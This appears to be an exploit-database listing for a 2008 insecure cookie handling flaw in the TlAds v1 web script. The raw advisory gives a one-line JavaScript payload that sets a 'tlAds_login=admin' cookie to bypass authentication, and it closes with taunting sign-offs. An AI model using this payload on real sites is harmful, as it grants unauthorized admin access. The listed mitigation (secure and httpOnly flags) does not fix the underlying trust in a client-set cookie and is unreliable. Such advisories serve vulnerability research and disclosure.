header-logo
Suggest Exploit
vendor:
TlAds
by:
x0r - Evolution Team
7.5
CVSS
HIGH
Insecure Cookie Handling
613
CWE
Product Name: TlAds
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

TlAds v 1 => Insecure Cookie Handling

The exploit involves setting the cookie 'tlAds_login' to 'admin' and setting the path to '/'

Mitigation:

Ensure that cookies are set with secure flag and httpOnly flag
Source

Exploit-DB raw data:

##############################
# TlAds v 1 => Insecure Cookie Handling
#
# Found By : x0r - Evolution Team
#
# Download: http://www.easy-script.com/scripts-dl/tlads-1.zip
###############################

Exploit:

javascript:document.cookie = "tlAds_login=admin; path=/"

Stupid Admin ! P0wned :P

Grazie Al Mio Amore...Ti Amo Da Morire Margherita :P


#Proud To Be Italian 

# milw0rm.com [2008-10-27]

Navigation

Suggest Exploit

Services By CQR